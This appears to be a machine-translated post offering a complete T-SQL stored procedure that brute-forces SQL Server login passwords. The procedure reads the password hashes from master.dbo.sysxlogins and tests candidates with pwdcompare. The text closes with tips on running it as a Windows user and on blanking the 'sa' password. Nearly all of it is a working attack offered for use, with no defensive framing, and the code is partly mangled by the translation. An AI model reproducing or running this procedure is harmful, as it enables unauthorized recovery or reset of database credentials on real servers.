If exists (select * From DBO. sysobjects where id = object_id (n' [DBO]. [p_getpassword] ') and objectproperty (ID, n' isprocedure') = 1)
Drop procedure [DBO]. [p_getpassword]
Go
/* -- Brute-force cracking SQL Server user password
Attackers can crack passwords with Chinese characters, special characters, characters, and trailing spaces.
For the convenience of displaying passwords with special characters, the displayed results show the ASCII
In theory, the password of any number of digits can be cracked. Generally, the password of three digits cannot be cracked by computers.
The condition is that your computer is configured enough time
-- Producer build 2004.08 (reference please keep this information )--*/
/* -- Call example
-- Test special characters
Declare @ PWD sysname
Set @ Pwd = char (0) + 'A'
Exec sp_password null, @ PWD, 'sa'
Exec p_getpassword
-- Test the password with spaces
Exec sp_password null, 'A', 'sa'
Exec p_getpassword
-- Test Chinese
Exec sp_password null, 'I', 'sa'
Exec p_getpassword
-- Clear Password
Exec sp_password null, null, 'sa'
--*/
Create proc p_getpassword
@ Username sysname = NULL, -- user name. If this parameter is not specified, all users are listed.
@ Pwdlen Int = 3 -- number of digits for password cracking. By default, only three or less passwords are cracked.
As
-- Generate the user table of the password to be cracked
Select name, password
, Type = case when xstatus & 2048 = 2048 then 1 else 0 end
, JM = case when password is null or datalength (password) <46
Then 1 else 0 end
, Pwdstr = case when datalength (password) <46
Then cast (password as sysname)
Else cast (''as sysname) End
, Pwd = cast (''as varchar (8000 ))
Into # pwd
From master. DBO. sysxlogins
Where srvid is null
And name = isnull (@ username, name)
-- Generate a temporary table
Select top 255 id = identity (INT,) into # T from sysobjects A, sysobjects B
Alter table # t add constraint pK _ # T primary key (ID)
-- Clear unnecessary characters
If not exists (select 1 from # PWD where type = 1)
Delete from # t where ID between 65 and 90 or ID between 129 and 254
-- Password cracking
Declare @ l int
Declare @ S1 varchar (8000), @ S2 varchar (8000), @ S3 varchar (8000), @ S4 varchar (8000)
-- Crack the 1-bit password
Select @ l = 0
, @ S1 = 'id = A. id'
, @ S2 = '# T'
, @ S3 = 'Char (B. ID )'
, @ S4 = 'Cast (B. ID as varchar )'
Exec ('
Update PWD set JM = 1, pwdstr = '+ @ S3 +'
, Pwd = '+ @ S4 +'
From # PWD, # T B
Where PWD. jm = 0
And pwdcompare ('+ @ S3 +', PWD. Password, PWD. Type) = 1
')
-- Crack passwords with more than two digits
While exists (select 1 from # PWD where JM = 0 and @ l <@ pwdlen-1)
Begin
Select @ l = @ L + 1
, @ S1 = @ S1 + ', id' + Cast (@ l as varchar)
+ '=' + Char (@ l/26 + 97) + char (@ l % 26 + 97) + '. id'
, @ S2 = @ S2 + ', # t' + char (@ l/26 + 97) + char (@ l % 26 + 97)
, @ S3 = @ S3 + '+ char (B. id' + Cast (@ l as varchar) + ')'
, @ S4 = @ S4 + '+ '','' + Cast (B. ID' + Cast (@ l as varchar) + 'as varchar )'
Exec ('
Select '+ @ S1 + 'into # TT from' + @ S2 +'
Update PWD set JM = 1, pwdstr = '+ @ S3 +'
, Pwd = '+ @ S4 +'
From # PWD, # TT B
Where PWD. jm = 0
And pwdcompare ('+ @ S3 +', PWD. Password, PWD. Type) = 1
')
End
-- Display the cracked Password
Select username = Name, password = pwdstr, password ASCII = pwd
From # pwd
Go
The above is a brute-force password cracking condition that you need an Administrator Account
If you do not have an administrator account, you can log on as a Windows user and execute the above stored procedure to retrieve the password.
If you only want to retrieve the SA, you can log on directly as a Windows user and clear the SA password:
Sp_password null, null, 'sa'